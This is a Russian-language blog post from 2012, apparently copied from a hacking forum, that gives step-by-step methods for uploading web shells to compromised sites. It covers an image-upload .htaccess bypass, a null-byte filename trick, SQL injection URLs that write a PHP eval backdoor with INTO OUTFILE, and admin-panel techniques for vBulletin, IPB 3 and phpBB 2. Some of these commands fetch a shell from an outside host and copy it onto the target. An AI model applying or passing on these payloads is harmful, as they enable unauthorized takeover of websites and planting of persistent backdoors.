.
13 ноября 2012

Заливаем шелл на разные CMS

posted in security |

За особой важностью информации полностью содрано отсюда Способы заливки шелла

Льем шелл через картинку

Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы .jpg, .gif, .png.
Что в этом случаем можно сделать?

Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и создаем файл .htaccess с содержимым

AddType application/x-httpd-php .gif
Данная команда выполнит формат .gif как php
Пробуем открыть [path]/shell.gif

Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg, проверять доступность shell.php, а вдруг?

Способ заливки шелла через mysql.user из скули

1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Узнаем под кем мы сидим)
2)site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user='<em><strong>наш юзер</strong></em>'+--+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3)site.com/index.php?id=-1+union+select+1,'< ?php eval($_REQUEST[cmd]); ?>',3+from+mysql.user+into+outfile+'<em><strong>Путь до файла</strong></em>'+--+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:

site.com/index.php?id=1+and+1=0+union+Select+1,'<strong><em>prava</em></strong>',3+from+mysql.user+--+
Если prava отобразится, то права есть.

Следующая ситуация. Мы в админке форумного движка vBulletin

Заходим:
Plugins & Products -> Plugin Manager -> [Add New Plugin]
Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]

Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.

Далее выводим phpinfo ()

localhost/forum/faq.php?cmd=phpinfo();

Если мы вывели phpinfo () то считайте шелл у нас в руках.

Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php). Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php

Заливаем шелл в IPB 3


Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

Код:
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
Полный путь можно посмотреть так:

Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO

Шелл тут:
http://site.com/uploads/shell.php

Заливаем шелл в phpBB 2

1. Создаём файл ex.sql
2. Прописываем туда

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;
Где user_id=2 — идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo () нужно быть авторизованным.

Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
WSO

Яндекс.Метрика